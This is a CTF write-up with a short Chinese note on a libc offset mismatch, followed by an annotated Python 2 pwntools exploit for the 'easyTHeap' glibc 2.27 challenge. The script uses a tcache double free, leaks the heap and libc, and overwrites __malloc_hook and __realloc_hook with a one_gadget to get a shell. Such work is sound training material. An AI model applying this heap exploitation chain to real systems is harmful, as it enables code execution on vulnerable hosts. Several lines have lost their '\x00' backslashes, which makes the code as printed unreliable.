pwn_debug
pwn_debug 的 2.27 版本计算出来 <main_arena+96> 到 libc_base 的偏移为 0x3afca0，而 ub18 的 2.27 偏移算出来是 0x3ebca0。远程一直打不通，卡了一整天，后来是别的师傅调出来告诉我的 orz...
exp 脚本
from pwn_debug import *
# --- Environment setup ------------------------------------------------------
# pwn_debug wraps pwntools; what each of its calls does is not visible in this
# file. Going by the names: `debug(version)` selects a glibc build for
# debugging, `local(libc)` runs the binary against that libc, `remote(host,
# port)` records the challenge endpoint, and `run(mode)` returns the tube.
context.log_level = 'debug'

BINARY = './vn_pwn_easyTHeap'
LIBC_PATH = './libc/libc-2.27.so'

pdbg = pwn_debug(BINARY)
pdbg.debug('2.27')
pdbg.local(LIBC_PATH)
pdbg.remote('node3.buuoj.cn', 28327)

# Switch the argument to the remote mode for the live target; the tube API
# used by the helpers below is the same either way.
p = pdbg.run('local')

# Symbols are resolved from the distribution libc on disk instead of
# pdbg.libc: the note above the script says pdbg's own 2.27 build yields a
# different <main_arena+96> offset (0x3afca0) than the Ubuntu 18.04 libc
# (0x3ebca0), which is the value hard-coded further down.
libc = ELF(LIBC_PATH)
#libc = pdbg.libc
def add(size):
    """Menu option 1: ask the target to allocate `size` bytes.

    The target does not return an index; the script tracks slots by
    allocation order (see the index comments on each add() call).
    """
    replies = (("choice: ", '1'), ("size?", str(size)))
    for prompt, reply in replies:
        p.sendlineafter(prompt, reply)
def edit(index,content):
    """Menu option 2: write `content` (raw bytes/str) into the slot at `index`.

    `content` is sent as-is with a trailing newline; the caller is
    responsible for any packing (p64 etc.).
    """
    replies = (
        ('choice: ', '2'),
        ("idx?", str(index)),
        ("content:", content),
    )
    for prompt, reply in replies:
        p.sendlineafter(prompt, reply)
def show(index):
    """Menu option 3: have the target print the slot at `index`.

    Nothing is read back here; the caller pulls the echoed bytes from the
    tube (the script below does `p.recv(6)` right after each call).
    """
    send = p.sendlineafter
    send("choice: ", '3')
    send("idx?", str(index))
def free(index):
    """Menu option 4: free the slot at `index`.

    No bookkeeping is done on this side: the script calls this twice for
    the same index back to back, which only makes sense if the target
    presumably leaves the freed pointer in its slot (a dangling pointer /
    double free in the target — not verifiable from this file).
    """
    choice, idx = '4', str(index)
    p.sendlineafter("choice: ", choice)
    p.sendlineafter("idx?", idx)
# --- Stage 1: leak a heap address -------------------------------------------
add(0x100)  # index 0
add(0x10)   # index 1
# The same index is freed twice with no allocation in between; this relies on
# the target presumably not clearing its slot after free (double free).
free(0)
free(0)
show(0)
# The first 6 bytes echoed back are read as a pointer; 0x250 is the author's
# distance from that value back to the heap start (not verifiable here).
# NOTE(review): as printed, 'x00' is a three-character string and str.ljust
# requires a one-character fill, so this line raises TypeError; the backslash
# of a '\x00' escape appears to have been lost in transcription (the same
# applies to the 'x07' / 'x01' payloads in the edit() calls below).
heap_addr = u64(p.recv(6).ljust(8,'x00'))-0x250
# --- Stage 2: get a slot that overlaps the heap start -----------------------
add(0x100)  # index 2 — reuses chunk 0, which is still on the free list after the double free
edit(2,p64(heap_addr))   # overwrite the free-list link of that chunk with heap_addr
add(0x100)  # index 3
add(0x100)  # index 4 — presumably served from heap_addr itself
# Writes a single 0x07 at offset 15 of that region. Given the glibc 2.27
# target the author's intent is presumably to make the 0x110 tcache bin look
# full so the next free of chunk 0 goes to the unsorted bin instead — TODO
# confirm in gdb; nothing in this file establishes the layout.
edit(4,'x00'*15 + 'x07')
# --- Stage 3: leak libc -----------------------------------------------------
free(0)
show(0)
# 0x3ebca0 is the <main_arena+96> -> libc base offset for the Ubuntu 18.04
# glibc 2.27 build (see the note above the script); pwn_debug's own 2.27
# produced 0x3afca0, which is why `libc` is the on-disk ELF and not pdbg.libc.
libcbase = u64(p.recv(6).ljust(8,'x00')) - 0x3ebca0
malloc_hook = libcbase + libc.symbols['__malloc_hook']
realloc = libcbase + libc.symbols['realloc']
# Author-supplied one_gadget candidates for this libc build; only [2] is used.
one_ge=[0x4f2c5,0x4f322,0x10a38c]
# NOTE(review): this attach is live while the three below are commented out.
# It is only meaningful for pdbg.run('local'); comment it out before
# switching the run mode to the remote target.
gdb.attach(p)
# --- Stage 4: redirect an allocation onto the malloc hook -------------------
# Rewrites the count from above to 0x01, zero-fills the intervening entries
# and plants malloc_hook-8 as a free-list entry so the next add() returns
# that address (again presumably the tcache layout — not verifiable here).
edit(4,'x00'*15+'x01'+p64(0)*21+p64(malloc_hook-8))
#gdb.attach(p)
print p64(libcbase+one_ge[2])+p64(realloc+4)   # Python 2 print statement (debug output)
#p.interactive()
add(0x100)  # index 5 — expected to be served from malloc_hook-8
#gdb.attach(p)
print 'one_ge[2]:'+ str(hex(libcbase+one_ge[2]))
print 'realloc+4:' +str(hex(realloc+4))
# Two pointers written starting at malloc_hook-8: the gadget address, then
# realloc+4 into __malloc_hook. The author presumably relies on the
# 8 bytes before __malloc_hook being __realloc_hook, so that malloc ->
# realloc -> realloc hook reaches the gadget with an adjusted stack; the
# "+4" offset is the author's choice and is not explained in this file.
edit(5,p64(libcbase+one_ge[2])+p64(realloc+4))
#gdb.attach(p)
# Any further allocation now goes through the overwritten hooks. Defender
# note: this technique depends on __malloc_hook/__realloc_hook, which were
# removed from glibc's public interface in 2.34.
add(0x100)
p.interactive()